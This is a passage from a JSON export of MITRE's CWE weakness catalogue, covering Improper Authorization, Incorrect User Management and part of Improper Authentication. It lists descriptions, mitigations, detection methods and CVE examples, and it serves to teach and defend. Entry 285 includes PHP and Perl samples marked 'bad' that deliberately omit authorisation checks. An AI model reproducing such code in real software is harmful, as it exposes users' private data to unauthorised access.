Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":[{"#text":"Access Control Issues","attr":{"@_Date":"2008-09-09"}},{"#text":"Access Control (Authorization) Issues","attr":{"@_Date":"2011-03-29"}}]}},"285":{"attr":{"@_ID":"285","@_Name":"Improper Authorization","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.","Extended_Description":{"xhtml:p":["Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user\'s privileges and any permissions or other access-control specifications that apply to the resource.","When access control checks are not applied consistently - or not at all - users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}},{"attr":{"@_Name":"Database Server","@_Prevalence":"Often"}}]},"Background_Details":{"Background_Detail":"An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: \\"No access\\", \\"Read access\\", \\"Change access\\", and \\"Full control\\". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object."},"Alternate_Terms":{"Alternate_Term":{"Term":"AuthZ","Description":"\\"AuthZ\\" is typically used as an abbreviation of \\"authorization\\" within the web application security community. It is distinct from \\"AuthN\\" (or, sometimes, \\"AuthC\\") which is an abbreviation of \\"authentication.\\" The use of \\"Auth\\" as an abbreviation is discouraged, since it could be used for either authentication or authorization."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":{"xhtml:p":["REALIZATION: This weakness is caused during implementation of an architectural security tactic.","A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies."]}},{"Phase":"Architecture and Design","Note":{"xhtml:p":"Authorization weaknesses may arise when a single-user application is ported to a multi-user environment."}},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"An attacker could read sensitive data, either by reading the data directly from a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to read the data."},{"Scope":"Integrity","Impact":["Modify Application Data","Modify Files or Directories"],"Note":"An attacker could modify sensitive data, either by writing the data directly to a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to write the data."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could gain privileges by modifying or reading critical data directly, or by accessing insufficiently-protected, privileged functionality."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-6"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.","Generally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software\'s design may include some functionality that is accessible to any user and does not require an authorization check; an automated technique that detects the absence of authorization may report false positives."]},"Effectiveness":"Limited"},{"Method":"Automated Dynamic Analysis","Description":"Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine if the lack of authorization violates business logic"},{"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms."]},"Effectiveness":"Moderate","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints."},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host Application Interface Scanner","Fuzz Tester","Framework-based Fuzzer","Forced Path Execution","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) to enforce the roles at the appropriate boundaries.","Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role."]}},{"Phase":"Architecture and Design","Description":"Ensure that you perform access control checks related to your business logic. These checks may be different than the access control checks that you apply to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient\'s doctor."},{"attr":{"@_Mitigation_ID":"MIT-4.4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45]."]}},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.","One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page."]}},{"Phase":["System Configuration","Installation"],"Description":"Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a \\"default deny\\" policy when defining these ACLs."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-95"},"Intro_Text":"This function runs an arbitrary SQL query on a given database, returning the result of the query.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function runEmployeeQuery($dbName, $name){}$employeeRecord = runEmployeeQuery(\'EmployeeDB\',$_GET[\'EmployeeName\']);","xhtml:div":{"#text":"mysql_select_db($dbName,$globalDbHandle) or die(\\"Could not open Database\\".$dbName);$preparedStatement = $globalDbHandle-&gt;prepare(\'SELECT * FROM employees WHERE name = :name\');$preparedStatement-&gt;execute(array(\':name\' =&gt; $name));return $preparedStatement-&gt;fetchAll();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:i":"//Use a prepared statement to avoid CWE-89"},"xhtml:br":["","",""],"xhtml:i":"/.../"}},"Body_Text":"While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database."},{"attr":{"@_Demonstrative_Example_ID":"DX-96"},"Intro_Text":"The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"sub DisplayPrivateMessage {}my $q = new CGI;if (! AuthenticateUser($q-&gt;param(\'username\'), $q-&gt;param(\'password\'))) {}my $id = $q-&gt;param(\'id\');DisplayPrivateMessage($id);","xhtml:div":[{"#text":"my($id) = @_;my $Message = LookupMessageObject($id);print \\"From: \\" . encodeHTML($Message-&gt;{from}) . \\"&lt;br&gt;\\\\n\\";print \\"Subject: \\" . encodeHTML($Message-&gt;{subject}) . \\"\\\\n\\";print \\"&lt;hr&gt;\\\\n\\";print \\"Body: \\" . encodeHTML($Message-&gt;{body}) . \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"ExitError(\\"invalid username or password\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","","","","","","","","",""],"xhtml:i":["# For purposes of this example, assume that CWE-309 and","# CWE-523 do not apply."]}},"Body_Text":["While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users.","One way to avoid this problem would be to ensure that the \\"to\\" field in the message object matches the username of the authenticated user."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3168","Description":"Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3168"},{"Reference":"CVE-2009-2960","Description":"Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2960"},{"Reference":"CVE-2009-3597","Description":"Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3597"},{"Reference":"CVE-2009-2282","Description":"Terminal server does not check authorization for guest access.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2282"},{"Reference":"CVE-2009-3230","Description":"Database server does not use appropriate privileges for certain sensitive operations.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3230"},{"Reference":"CVE-2009-2213","Description":"Gateway uses default \\"Allow\\" configuration for its authorization settings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213"},{"Reference":"CVE-2009-0034","Description":"Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034"},{"Reference":"CVE-2008-6123","Description":"Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6123"},{"Reference":"CVE-2008-5027","Description":"System monitoring software allows users to bypass authorization by creating custom forms.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5027"},{"Reference":"CVE-2008-7109","Description":"Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7109"},{"Reference":"CVE-2008-3424","Description":"Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3424"},{"Reference":"CVE-2009-3781","Description":"Content management system does not check access permissions for private files, allowing others to view those files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3781"},{"Reference":"CVE-2008-4577","Description":"ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577"},{"Reference":"CVE-2008-6548","Description":"Product does not check the ACL of a page accessed using an \\"include\\" directive, allowing attackers to read unauthorized files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6548"},{"Reference":"CVE-2007-2925","Description":"Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2925"},{"Reference":"CVE-2006-6679","Description":"Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6679"},{"Reference":"CVE-2005-3623","Description":"OS kernel does not check for a certain privilege before setting ACLs for files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3623"},{"Reference":"CVE-2005-2801","Description":"Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801"},{"Reference":"CVE-2001-1155","Description":"Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Missing Access Control"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A10","Entry_Name":"Failure to Restrict URL Access","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A2","Entry_Name":"Broken Access Control","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP35","Entry_Name":"Insecure resource access"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"104"}},{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"402"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"5"}},{"attr":{"@_CAPEC_ID":"51"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"647"}},{"attr":{"@_CAPEC_ID":"668"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"77"}},{"attr":{"@_CAPEC_ID":"87"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-229"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 4, &#34;Authorization&#34; Page 114; Chapter 6, &#34;Determining&#xA;                  Appropriate Access Control&#34; Page 171"}},{"attr":{"@_External_Reference_ID":"REF-231"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-233"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Common Vulnerabilities of Authorization&#34;, Page 39"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, &#34;ACL Inheritance&#34;, Page 649"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-24","Modification_Importance":"Critical","Modification_Comment":"Changed name and description; clarified difference between \\"access control\\" and \\"authorization.\\""},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":[{"#text":"Missing or Inconsistent Access Control","attr":{"@_Date":"2009-01-12"}},{"#text":"Improper Access Control (Authorization)","attr":{"@_Date":"2011-03-29"}}]}},"286":{"attr":{"@_ID":"286","@_Name":"Incorrect User Management","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly manage a user within its environment.","Extended_Description":"Users can be assigned to the wrong group (class) of permissions resulting in unintended access rights to sensitive objects.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"User management errors"}},"Notes":{"Note":[{"#text":"The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).","attr":{"@_Type":"Maintenance"}},{"#text":"This item needs more work. Possible sub-categories include: user in wrong group, and user with insecure profile or \\"configuration\\". It also might be better expressed as a category than a weakness.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Applicable_Platforms, Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"User Management Issues","attr":{"@_Date":"2008-09-09"}}}},"287":{"attr":{"@_ID":"287","@_Name":"Improper Authentication","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"authentification","Description":"An alternate term is \\"authentification\\", which appears to be most commonly used by people from non-English-speaking countries."},{"Term":"AuthN","Description":"\\"AuthN\\" is typically used as an abbreviation of \\"authentication\\" within the web application security community. It is also distinct from \\"AuthZ,\\" which is an abbreviation of \\"authorization.\\" The use of \\"Auth\\" as an abbreviation is discouraged, since it could be used for either authentication or authorization."},{"Term":"AuthC","Description":"\\"AuthC\\" is used as an abbreviation of \\"authentication,\\" but it appears to used less frequently than \\"AuthN.\\""}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Read Application Data","Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands"],"Note":"This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or even execute arbitrary code."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-6"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis is useful for detecting certain types of authentication. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authentication libraries.","Generally, automated static analysis tools have difficulty detecting custom authentication schemes. In addition, the software\'s design may include some functionality that is accessible to any user and does not require an established identity; an automated technique that detects the absence of authentication may report false positives."]},"Effectiveness":"Limited"},{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Static Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Manual static analysis is useful for evaluating the correctness of custom authentication mechanisms."]},"Effectiveness":"High","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness 